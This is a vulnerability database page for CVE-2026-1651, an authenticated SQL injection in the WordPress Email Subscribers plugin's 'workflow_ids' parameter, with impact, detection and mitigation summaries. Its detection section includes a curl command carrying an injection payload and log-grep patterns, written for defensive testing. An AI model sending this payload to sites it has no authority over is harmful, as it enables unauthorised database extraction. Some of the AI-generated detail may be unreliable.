CVE-2026-1651
Received Received - Intake
SQL Injection in Email Subscribers Plugin Allows Data Extraction

Publication date: 2026-03-04

Last updated on: 2026-03-04

Assigner: Wordfence

Description
The Email Subscribers by Icegram Express plugin for WordPress is vulnerable to SQL Injection via the 'workflow_ids' parameter in all versions up to, and including, 5.9.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-04
Last Modified
2026-03-04
Generated
2026-06-16
AI Q&A
2026-03-04
EPSS Evaluated
2026-06-15
NVD
CVE-2026-1651
EUVD
EUVD-2026-9350
Affected Vendors & Products
Showing 3 associated CPEs
Vendor Product Version / Range
icegram email_subscribers to 5.9.16 (inc)
icegram email_subscribers to 5.9.16 (exc)
icegram email_subscribers 5.9.17
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-89 The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

[{'type': 'paragraph', 'content': "The Email Subscribers by Icegram Express WordPress plugin (up to version 5.9.16) contains an authenticated SQL Injection vulnerability in the 'workflow_ids' parameter. This flaw arises because the plugin insufficiently escapes and prepares this user-supplied parameter before including it in an SQL query."}, {'type': 'paragraph', 'content': "Specifically, the vulnerability exists in the update_status function where the 'workflow_ids' parameter is used directly in an SQL IN clause without proper validation or sanitization. The plugin uses esc_sql() which only escapes quotes and backslashes but does not adequately protect numeric inputs in this context. Additionally, string interpolation happens before the SQL query is prepared, allowing attackers to inject malicious SQL."}, {'type': 'paragraph', 'content': 'An attacker with administrator-level access can exploit this flaw to append additional SQL queries, enabling extraction of sensitive database information such as user credentials, email addresses, and plugin secrets.'}] [2]

Impact Analysis

[{'type': 'paragraph', 'content': "This vulnerability allows an authenticated attacker with administrator privileges to perform SQL Injection attacks on the plugin's database."}, {'type': 'list_item', 'content': 'Extract sensitive data such as user password hashes, email addresses, and plugin secrets.'}, {'type': 'list_item', 'content': 'Modify database contents by executing crafted UPDATE queries.'}, {'type': 'list_item', 'content': 'Potentially escalate privileges if combined with other vulnerabilities like broken access control.'}, {'type': 'paragraph', 'content': 'The exploitation can be done via an AJAX endpoint, allowing blind SQL injection techniques such as time-based and boolean-based attacks to extract data character-by-character.'}] [2]

Compliance Impact

I don't know

Detection Guidance

[{'type': 'paragraph', 'content': "This vulnerability can be detected by monitoring for suspicious authenticated AJAX requests targeting the Email Subscribers plugin's workflows update_status function. Specifically, look for AJAX POST requests with the action parameter set to 'wp_ajax_icegram-express' and method 'update_status' that include crafted 'workflow_ids' parameters containing unexpected SQL payloads."}, {'type': 'paragraph', 'content': "A practical detection method is to capture and analyze HTTP requests to the WordPress admin AJAX endpoint (usually /wp-admin/admin-ajax.php) for unusual or malformed 'workflow_ids' parameters that could indicate SQL injection attempts."}, {'type': 'paragraph', 'content': 'Example commands to detect such activity include using network traffic inspection tools or command-line utilities like curl or grep on server logs.'}, {'type': 'list_item', 'content': "Using grep to find suspicious AJAX requests in web server logs: grep 'admin-ajax.php' /var/log/apache2/access.log | grep 'action=wp_ajax_icegram-express' | grep 'update_status'"}, {'type': 'list_item', 'content': "Using curl to test for the vulnerability (requires admin authentication): curl -X POST -d 'action=wp_ajax_icegram-express&method=update_status&workflow_ids[]=1 OR 1=1' https://yourwordpresssite.com/wp-admin/admin-ajax.php -b cookies.txt -c cookies.txt"}, {'type': 'paragraph', 'content': 'Note that exploitation requires administrator-level authentication, so detection efforts should focus on monitoring admin user activity and AJAX requests related to the Email Subscribers plugin workflows.'}] [2]

Mitigation Strategies

[{'type': 'paragraph', 'content': 'Immediate mitigation steps include updating the Email Subscribers plugin to a version later than 5.9.16 where this SQL injection vulnerability has been fixed.'}, {'type': 'paragraph', 'content': 'If an update is not immediately possible, restrict administrator access to trusted users only, as exploitation requires administrator-level privileges.'}, {'type': 'paragraph', 'content': 'Additionally, monitor and restrict access to the AJAX endpoint handling workflows updates to prevent unauthorized or suspicious requests.'}, {'type': 'paragraph', 'content': "Consider applying Web Application Firewall (WAF) rules to detect and block SQL injection attempts targeting the 'workflow_ids' parameter in AJAX requests."}, {'type': 'paragraph', 'content': 'Review and audit administrator accounts for suspicious activity and change passwords if compromise is suspected.'}] [2]

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-1651. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart